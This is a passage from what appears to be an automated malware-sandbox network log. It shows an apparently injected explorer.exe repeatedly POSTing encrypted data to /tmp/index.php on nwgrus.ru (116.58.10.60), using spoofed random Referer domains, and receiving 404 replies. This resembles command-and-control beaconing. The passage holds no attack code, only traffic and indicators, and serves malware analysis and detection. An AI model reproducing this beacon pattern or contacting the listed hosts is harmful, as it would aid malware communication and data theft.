6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50573	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:55.777796984 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rajflukkjfv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 345 Host: nwgrus.ru
Oct 11, 2024 06:37:55.777796984 CEST	345	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 2b 57 e1 f1 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu+W[*oswYb-Dza/OJf2 1__P\|<5^bjiI-B[6w^0FPHA,!GYfAWNf`]1X_\|
Oct 11, 2024 06:37:57.005718946 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50581	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:37:58.776828051 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://toscrejivnmddao.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Oct 11, 2024 06:37:58.776828051 CEST	131	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 35 38 ff e0 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA ,[k,vu58\UFyZ8Q0}`r&\|Z
Oct 11, 2024 06:38:00.041280031 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:37:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50592	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:38:00.051572084 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xkeohrrlcufnjh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: nwgrus.ru
Oct 11, 2024 06:38:00.051572084 CEST	180	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 38 43 ba f4 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu8CsYmr(C+34F'PS-(DX_ab>[
Oct 11, 2024 06:38:01.303699017 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:38:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50598	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:38:01.353420019 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wmgqjswjxdwbrcxb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 289 Host: nwgrus.ru
Oct 11, 2024 06:38:01.353645086 CEST	289	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 28 4a cf 93 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu(Jy&xh[%6ncBI2eC!W9(cdt/*N$[z7MG~qnKGaBzWM=4
Oct 11, 2024 06:38:02.601669073 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:38:02 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50609	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:38:02.619596958 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kfvlpgkryjcljktf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 178 Host: nwgrus.ru
Oct 11, 2024 06:38:02.619611025 CEST	178	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 33 03 dd 94 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu3)TkH(A$."_J\:%AQD<NCes1=sN4n
Oct 11, 2024 06:38:03.860030890 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:38:03 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50615	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:38:04.121186972 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qcmpeqxglbq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 320 Host: nwgrus.ru
Oct 11, 2024 06:38:04.121220112 CEST	320	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 38 37 f0 9b Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu87{_\`DTkm:G9<z4m13l#W`~(0=dUd$R:*Fsf \tkF$y?(
Oct 11, 2024 06:38:05.389015913 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:38:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50626	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:38:05.398963928 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xorfrgussemjiclx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 333 Host: nwgrus.ru
Oct 11, 2024 06:38:05.398978949 CEST	333	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 7f 50 e8 eb Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuPPXjK/~"[0sv[#[("4C1GEv$P6b1.TO`OnG;i+0)I,vwuco8C[
Oct 11, 2024 06:38:06.632905960 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:38:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50636	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:38:06.721301079 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bpaltdgxnlbrc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 123 Host: nwgrus.ru
Oct 11, 2024 06:38:06.724843025 CEST	123	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 54 52 e6 e1 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vuTRN8oUDc&Hh0>`WZEt
Oct 11, 2024 06:38:07.949136019 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:38:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50643	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:38:07.959048033 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ourjknfcrerebmfy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 154 Host: nwgrus.ru
Oct 11, 2024 06:38:07.959081888 CEST	154	OUT	Data Raw: 3b 6e 54 66 f5 bf 61 21 ab d8 c9 02 75 75 7d cc 77 0b bb e5 62 09 e4 17 7e 7c 0e e5 45 c1 ce 1d ed 5b c0 58 06 6d 2b 1c e9 ea 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 5c 59 a6 e8 Data Ascii: ;nTfa!uu}wb~\|E[Xm+? 9Yt M@NA -[k,vu\Y8b^e(Op4q=OVGwA3sG("9w]2V
Oct 11, 2024 06:38:09.232206106 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Fri, 11 Oct 2024 04:38:08 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50654	116.58.10.60	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 11, 2024 06:38:09.241578102 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wijyucejeixqcq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: nwgrus.ru
